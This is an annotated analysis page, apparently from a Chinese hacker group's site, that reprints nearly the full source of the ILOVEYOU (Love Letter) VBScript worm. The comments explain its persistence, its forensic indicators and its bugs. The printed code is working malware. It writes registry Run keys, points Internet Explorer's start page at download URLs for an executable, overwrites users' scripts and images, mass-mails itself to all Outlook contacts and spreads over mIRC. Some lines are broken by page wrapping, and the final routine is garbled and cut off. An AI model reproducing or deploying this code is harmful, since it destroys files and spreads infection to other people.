爱虫病毒三分解析
'关于Love Letter的分析
'****************************病毒介绍**************************************
'barok -loveletter(vbe)
'by: spyder/ispyder@mail.com/@GRAMMERSoft Group/
'Manila,Philippines
'Comments beginning with ' added by The Hidden May 4 2000
'analysis:Robnih00d
'website:www.chinaghost.net(幽灵小组)
'用于我学习WSH,呵呵
'****************************病毒开始**************************************
' --- Script-level globals shared by every procedure below (no Option Explicit) ---
' fso      : Scripting.FileSystemObject used for all file, folder and drive access
' dirwin, dirsystem, dirtemp : special folders, assigned in main()
' eq       : last folder in which a mIRC script.ini was dropped (guard in infectfiles)
' ctr, dow : declared but never referenced anywhere in the visible listing
' file     : text-stream handle on the running script itself
' vbscopy  : the complete source text of the running script -- this is the payload
'            that infectfiles() writes into other files and spreadtoemail() attaches
dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
' Open the script's own file for reading (OpenTextFile mode 1 = ForReading).
set file = fso.OpenTextFile(WScript.ScriptFullname,1) '[read the worm's own source into file]
' Keep the whole text in memory for later infection. The handle is never closed;
' the process exiting is what releases it.
vbscopy=file.ReadAll'[store the contents in vbscopy for later infection]
'**************************************************************************
' Entry point. Everything the worm does happens from inside main().
main()
' main(): the worm's driver.
'   1. If a WSH script time-out is configured, sets it to 0 so the drive walk is not killed.
'   2. Drops three copies of itself:
'        dirsystem\MSKernel32.vbs            (started via HKLM Run key, see regruns)
'        dirwin\Win32DLL.vbs                 (started via HKLM RunServices key, see regruns)
'        dirsystem\LOVE-LETTER-FOR-YOU.TXT.vbs (the e-mail attachment, see spreadtoemail)
'   3. Calls regruns(), html() (body truncated in this listing), spreadtoemail(), listadriv().
' Incident-response note: the three file names above plus the registry keys written in
' regruns() and spreadtoemail() are the host indicators this sample leaves behind.
Sub main()
On Error Resume Next
Dim wscr,rr
Set wscr=CreateObject("WScript.Shell")
'check the time out value for WSH
' NOTE(review): key path as written in the sample; whether it matches the target
' host's WSH version cannot be confirmed from here. A failed RegRead is swallowed
' by the On Error above, in which case rr stays Empty and the If below is skipped.
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")'[check the time-out so a long run is not aborted]
If (rr>=1) then
' Set script time out to infinity
' NOTE(review): the RegWrite below is a single statement in the original; the page
' layout wrapped it across three lines, splitting the string literal mid-path.
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",
0, "REG_DWORD"
End if
'[get the Windows, System and Temp folders; copy the worm into the first two]
' GetSpecialFolder: 0 = WindowsFolder, 1 = SystemFolder, 2 = TemporaryFolder.
' dirtemp is never used in the visible listing.
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
' c is undeclared (no Option Explicit): a File object for the running script.
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
'****************************************************************************
' Persistence + IE start-page downloader, HTML dropper, Outlook mass-mail, file infection.
regruns()
html()
spreadtoemail()
listadriv()'[walk every drive]
end Sub
'****************************************************************************
' regruns(): registry persistence and the Internet Explorer start-page "downloader".
'   - HKLM\...\CurrentVersion\Run\MSKernel32       -> dirsystem\MSKernel32.vbs
'   - HKLM\...\CurrentVersion\RunServices\Win32DLL -> dirwin\Win32DLL.vbs
'   - While dirsystem\WinFAT32.exe is absent, point the IE start page at one of four
'     URLs (all under skyinet.net) whose target is WIN-BUGSFIX.exe, so the next IE start
'     offers the binary for download into IE's download directory.
'   - Once <download dir>\WIN-BUGSFIX.exe exists, add an HKLM Run key for it and reset
'     the start page to about:blank.
' IMPORTANT: the helper fileexist() is inverted -- it returns 1 when the file does NOT
' exist and 0 when it does. Both conditions below are written against that convention.
' Both HKLM writes require the user to have write access to HKLM; failures are hidden
' by On Error Resume Next.
sub regruns()'[modify the registry so the worm survives reboot]
On Error Resume Next
Dim num, downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
' IE's configured download directory; falls back to C:\ when the value is missing or empty.
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread = "") then
downread = "c:\"
end if
' fileexist(...) = 1  <=>  WinFAT32.exe is NOT present.
' NOTE(review): nothing in the visible listing creates WinFAT32.exe; presumably the
' downloaded WIN-BUGSFIX.exe does -- cannot be confirmed from this listing.
if (fileexist(dirsystem&"\WinFAT32.exe") = 1) Then
Randomize
num = Int((4 * Rnd) + 1)
' Pick one of four mirror URLs at random. The start page IS the .exe URL, so IE will
' prompt to download it rather than render a page.
' NOTE(review): the ";;" after the closing quote on the four regcreate lines below
' appears to be a page-rendering artifact; it is not VBScript syntax.
if num = 1 Then'[randomly change IE's start page to fetch the payload]
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe";;
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe";;
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe";;
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe";;
end if
end if
' fileexist(...) = 0  <=>  WIN-BUGSFIX.exe HAS been downloaded: persist it and hide the
' start-page change again.
if (fileexist(downread & "\WIN-BUGSFIX.exe") = 0) Then'[start it together with Windows]
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX", downread & "\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "about:blank"
end if
end Sub
'********************************************************************************
' listadriv(): walk every drive whose FSO DriveType is 2 (Fixed) or 3 (Network) and
' hand its root to folderlist(). Removable drives, CD-ROMs and RAM disks are skipped.
' Because folderlist() only visits SUBfolders, files in a drive's root are never infected.
' NOTE(review): "listadriv = s" assigns to the name of a Sub (not a Function) and s is
' never set; under On Error Resume Next the statement is silently ignored.
sub listadriv'[walk the drives; compare the MSDN FileSystemObject sample]
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path & "\")
end if
Next
listadriv = s
end Sub
'*********************************************************************************
' infectfiles(folderspec): overwrite/replace files in ONE folder with the worm's source
' (vbscopy) and, if the folder looks like a mIRC install, drop a script.ini that spreads
' the HTML dropper over DCC. Per extension (compared lower-case):
'   vbs, vbe                      -> contents replaced in place
'   js, jse, css, wsh, sct, hta   -> contents replaced, copied to <basename>.vbs, original deleted
'   jpg, jpeg                     -> contents replaced, copied to <name>.jpg.vbs, original deleted
'   mp3, mp2                      -> new <name>.mp3.vbs created, original marked Hidden
' OpenTextFile mode 2 is ForWriting (truncate), not ForAppending (8): the original file
' content is destroyed, not appended to -- this is why victims lost their pictures.
' Forensics note: the doubled extensions (*.jpg.vbs, *.mp3.vbs) and a fresh script.ini
' next to mirc32.exe are reliable on-disk indicators.
sub infectfiles(folderspec) '[infection routine: writes vbscopy (the worm's own text) into target files]
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
s = lcase(f1.name)
' Script files: overwrite in place, name unchanged.
if (ext = "vbs") or (ext = "vbe") then
set ap = fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
' Other script/markup types: overwrite, copy to folder\<basename>.vbs, delete original.
elseif(ext = "js") or (ext = "jse") or (ext = "css") or _
(ext = "wsh") or (ext = "sct") or (ext = "hta") then
set ap = fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname = fso.GetBaseName(f1.path)
set cop = fso.GetFile(f1.path)
cop.copy(folderspec & "\" & bname & ".vbs")
fso.DeleteFile(f1.path)
' Images: overwrite, copy to <full name>.vbs (e.g. photo.jpg.vbs), delete original.
elseif(ext = "jpg") or (ext = "jpeg") then
set ap=fso.OpenTextFile(f1.path, 2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path & ".vbs")
fso.DeleteFile(f1.path)
' Audio: original kept but hidden; a sibling <full name>.vbs is created alongside it.
' NOTE(review): attributes + 2 adds rather than ORs the Hidden bit, so a file that is
' already hidden gets a different attribute set instead of staying hidden.
elseif(ext="mp3") or (ext="mp2") then
set mp3 = fso.CreateTextFile(f1.path & ".vbs")
mp3.write vbscopy
mp3.close
set att = fso.GetFile(f1.path)
att.attributes = att.attributes + 2
end if
' mIRC spread: if any of the five marker files is found here, write a script.ini that
' DCC-sends dirsystem\LOVE-LETTER-FOR-YOU.HTM to every nick that joins any channel
' (except the victim's own nick). eq remembers the folder so this is written only
' once per folder even when several marker files are present.
' The .HTM is presumably produced by html(), whose body is truncated in this listing.
if (eq<>folderspec) then'[spread via IRC]
if (s = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or _
(s = "script.ini") or (s = "mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
' NOTE(review): the next two WriteLine statements are each one line in the original;
' the page layout wrapped their string literals. The "fake author" comment lines are
' social engineering aimed at anyone who opens script.ini.
scriptini.WriteLine ";Please dont edit this script... mIRC will
corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not
run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com";;
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=/if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2=/.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
'****************************************************************************
' folderlist(folderspec): depth-first walk. For each SUBfolder of folderspec, infect its
' files (infectfiles) and then recurse into it. folderspec's own files are not passed to
' infectfiles -- the caller is expected to have done that, and listadriv() does not, so
' drive roots are skipped. There is no depth limit; recursion depth equals the deepest
' directory tree on the drive.
sub folderlist(folderspec)'[walk the directory tree]
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end Sub
'*****************************************************************************
' regcreate(regkey, regvalue): write regvalue to the registry value named regkey via
' WScript.Shell.RegWrite. No value type is passed (contrast the explicit "REG_DWORD"
' writes in main and spreadtoemail). No On Error handler here: a failed write raises
' into the caller, where every caller's On Error Resume Next discards it.
sub regcreate(regkey,regvalue)'[registry write helper]
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end Sub
'*****************************************************************************
' regget(value): read a registry value via WScript.Shell.RegRead.
' No On Error handler: RegRead on a missing value raises into the caller. In regruns()
' the caller pre-sets downread to "" before calling, which is presumably what makes the
' "value missing" case collapse into the "" check there -- verify against the host.
function regget(value)'[registry read helper]
Set regedit = CreateObject("WScript.Shell")
regget = regedit.RegRead(value)
end function
'*****************************************************************************
' fileexist(filespec): INVERTED existence test.
'   returns 0 when the file exists
'   returns 1 when it does not
' Callers in regruns() compare against 1 ("absent") and 0 ("present") accordingly; read
' them with this inversion in mind.
function fileexist(filespec)'[does the file exist? 0 = yes, 1 = no]
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end Function
'*****************************************************************************
' folderexist(folderspec): intended as the folder counterpart of fileexist (same inverted
' 0 = exists / 1 = missing convention) but broken twice:
'   - GetFolderExists is not a FileSystemObject method (FolderExists is);
'   - the result is assigned to fileexist, not folderexist, so this function never
'     returns a value.
' Nothing in the visible listing calls it, so neither defect affects the worm's behaviour.
function folderexist(folderspec)'[does the folder exist? -- dead/broken code]
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end Function
'*****************************************************************************
' spreadtoemail(): mass-mail via Outlook automation (Outlook.Application / MAPI namespace).
' For every address list, and for every entry in it, send one message:
'   Subject    "ILOVEYOU"
'   Body       "kindly check the attached LOVELETTER coming from me."
'   Attachment dirsystem\LOVE-LETTER-FOR-YOU.TXT.vbs
' Bookkeeping lives under HKCU\Software\Microsoft\WAB\:
'   WAB\<entry> = 1 (REG_DWORD)   written after each send  -> never mail that entry twice
'   WAB\<list>  = entry count     written per list         -> skip a list whose size has
'                                                            not grown since the last run
' Forensics note: those WAB\ values are a complete list of who the victim's copy mailed.
' Observations:
'   - regv defaults to 1 when no count is stored, and the gate is Count > regv, so a
'     list with exactly one entry is never mailed.
'   - regv is not reset before RegRead (regad is); if the read fails under On Error
'     Resume Next it presumably keeps the previous list's value -- unverified here.
'   - x shadows ctrentries (both advance by one per iteration).
'   - out, mapi, male are undeclared; b is declared but unused.
'   - several statements below are single lines in the original that the page layout
'     wrapped (the RegRead at "WAB\" & / malead, the Body string, the two RegWrite calls).
sub spreadtoemail()'[spread by e-mail through MAPI]
On Error Resume Next
dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
set regedit = CreateObject("WScript.Shell")
set out = WScript.CreateObject("Outlook.Application")'[Outlook only]
set mapi = out.GetNameSpace("MAPI")
for ctrlists = 1 to mapi.AddressLists.Count'[not the first N contacts -- ALL of them]
set a = mapi.AddressLists(ctrlists)
x = 1
' "& a" concatenates the AddressList object, i.e. its default property (presumably Name).
regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
if (regv = "") then
regv = 1
end if
if (int(a.AddressEntries.Count) > int(regv)) then
for ctrentries = 1 to a.AddressEntries.Count
malead = a.AddressEntries(x)
' regad stays "" when the per-entry value does not exist (the failing RegRead is
' swallowed by On Error Resume Next), which is the "not yet mailed" signal.
regad = ""
regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" &
malead)
if (regad = "") then
' CreateItem(0) = olMailItem
set male = out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"'[the subject line that gave the worm its name]
male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from
me."
male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
' Mark this recipient as done so re-runs (e.g. from the Run key) do not re-send.
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead,
1, "REG_DWORD"
end if
x = x + 1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out = Nothing
Set mapi = Nothing
end Sub
'*****************************************************************************
sub html
On Error Resume Next
dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
dta1= "LOVELETTER - HTML-?TITLE>@
CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"good...@-
@>"&vbcrlf& _
"-?HEAD>#LOVE-
LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"onKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-
YOU.HTM#-
#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"This HTML file need ActiveX Control-?p>
To Enable to
read this HTML file
-
Please press #-#YES#-# button to Enable ActiveX-?p>"&vbcrlf& _
"-?CENTER>